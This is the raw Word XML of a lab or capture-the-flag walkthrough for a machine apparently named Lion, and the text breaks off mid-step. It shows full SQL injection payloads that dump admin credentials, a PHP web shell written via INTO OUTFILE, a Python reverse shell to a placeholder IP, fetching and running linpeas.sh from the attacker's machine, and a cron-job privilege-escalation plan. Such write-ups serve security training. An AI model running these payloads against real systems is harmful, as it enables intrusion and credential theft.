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LION ENG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8m17073bue5"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2o78sfshj1ec"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222500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="4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yf1pvu8i2k"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3"/>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111 – RPCBIND</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000010">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>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3306 – MYSQL</w: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ciqsodbkvlqp" w:id="7"/>
      <w:bookmarkEnd w:id="7"/>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from that wordlist, then checks the HTTP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the administration page → </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/admin</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, but we do not have the password.</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Unfortunately, the login field is not vulnerable to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SQLi</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6">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971800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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search.php</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7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 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Search</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> field. I will type the word </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"teste"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> into this field.</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submitting "teste" in the field, it returns the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05100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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d9w2m4vyolqm" w:id="8"/>
      <w:bookmarkEnd w:id="8"/>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286000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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3q3dq8jxx349" w:id="9"/>
      <w:bookmarkEnd w:id="9"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SQL Injection</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try injecting some SQLi commands to verify whether this parameter is vulnerable to SQL injection.</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need to identify the number of columns in the table.</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1,2,3,4,5,6#</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6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did not return anything, so let’s increase the number of columns.</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1,2,3,4,5,6,7#</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54300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="7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Alright, apparently we have </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">7 columns</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, and the number </w:t>
      </w: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sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> was reflected. We will use column 2 to retrieve database information. I will use the following command to see the database version:</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1,@@version,3,4,5,6,7#</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51100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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query result is:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">5.5.68-Maria-DB. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now I will retrieve the database name:</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1,database(),3,4,5,6,7#</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66"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the database name. Now I will retrieve the table names from this database.</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1,table_name,3,4,5,6,7 from information_schema.tables where table_schema = 'news'#</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94100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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tbladmin</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tblcategory</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tblcomments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tblpages</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tblposts</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000035">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tblsubcategory</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the names of the 6 tables. The most important table for us is </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"tbladmin"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, so we will list its columns.</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1,column_name,3,4,5,6,7 from information_schema.columns where table_name = 'tbladmin'#</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92500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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id</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>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AdminUserName</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AdminPassword</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AdminEmailid</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Is_Active</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CreationDate</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000040">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>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 UpdationDate</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For us, the most important ones are</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 AdminUserName &amp; AdminPassword</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 so I will get the values of those,</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> n</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ow I will retrieve the values from these columns. We will use the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">concat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function, which allows us to combine two or more expressions together.</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union select 1,concat(AdminUserName,":",AdminPassword),3,4,5,6,7 from tbladmin#</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000043">
      <w:pPr>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7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Bcrypt </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">provides greater security than other cryptographic algorithms because it contains a variable proportional to the amount of processing required to encrypt the desired information, making it resistant to brute-force attacks.</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it will not be possible to crack this </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">hash </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since we have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we can attempt to write a PHP webshell into a directory where we have write permissions.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000047">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5sxmdevlsuo9" w:id="10"/>
      <w:bookmarkEnd w:id="10"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload:</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system($_GET['cmd']) ?&gt;</w:t>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testing some directories such as:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>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/var/www/html</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/var/www/html/images</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>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/var/www/html/vendor</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was able to write to the directory </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/var/www/html/includes</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> the file </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cmd.php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containing the payload. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SQL </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">command used to write the file:</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'union select 1,"&lt;?php system($_GET['cmd']) ?&gt;",3,4,5,6,7 into outfile "/var/www/html/includes/cmd.php"#</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Therefore, if we access </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/includes</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we can see that our file was successfully written =)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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6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execute commands on the system, we will access </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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/includes/cmd.php?cmd=&lt;command&gt;</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I will use the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">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http://$site/includes/cmd.php?cmd=id</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6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20193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Alright, we have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on the server. The next step will be to obtain a</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> reverse shell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To do this, we will use the command </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">whereis python</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http://$site/includes/cmd.php?cmd=whereis python</w:t>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w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Python2 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">installed on the server, so we will use a Python2 reverse shell:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000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0"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("&lt;IP&gt;",&lt;PORT&gt;));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")'</w:t>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http://$site/includes/cmd.php?cmd=python -c 'import</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socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("&lt;IP&gt;",&lt;PORT&gt;));os.dup2(s.fileno(),0);</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sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")'</w:t>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 😀</w:t>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7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74idcy9n433o" w:id="11"/>
      <w:bookmarkEnd w:id="11"/>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jpim7ug4dak4" w:id="12"/>
      <w:bookmarkEnd w:id="12"/>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5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7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eydj92s3xz90" w:id="13"/>
      <w:bookmarkEnd w:id="13"/>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xmoq79prgafy" w:id="14"/>
      <w:bookmarkEnd w:id="14"/>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hyperlink r:id="rId27">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>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LinPEAS </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">is a script that searches for possible paths to escalate privileges on Linux / Unix* / MacOS hosts.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000071">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The checks are explained at:</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:hyperlink r:id="rId28">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w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>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Downloading LinPEAS on our machine:</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https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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0"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a Python server on our machine so we can send </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">LinPEAS </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">to the compromised server.</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7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compromised server, we run:</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/tmp</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http://&lt;IP-VPN&gt;/linpeas.sh</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linpeas.sh</w:t>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1"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./linpeas.sh</w:t>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13100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="4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jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.8k5wd4kjy56x" w:id="15"/>
      <w:bookmarkEnd w:id="15"/>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wgdnim5j09hx" w:id="16"/>
      <w:bookmarkEnd w:id="16"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Linux Privilege Escalation Exploiting Cronjobs</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000081">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2c8w6ve80zx1" w:id="17"/>
      <w:bookmarkEnd w:id="17"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">What is a cron job?</w:t>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Cron Jobs are used to schedule tasks by executing commands at specific dates and times on the server. They are most commonly used for system administrator tasks, such as backups or cleaning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directories, and so on. The word Cron comes from crontab and is located in the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc</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/opt/lion</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we find a file </w:t>
      </w:r>
      <w:hyperlink r:id="rId33">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">http://lion.bakcup.sh/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">  that is a cronjob belonging to the root user.</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Fortunately, we have write permission on this file.</w:t>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insert a reverse shell inside this file.</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it is a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
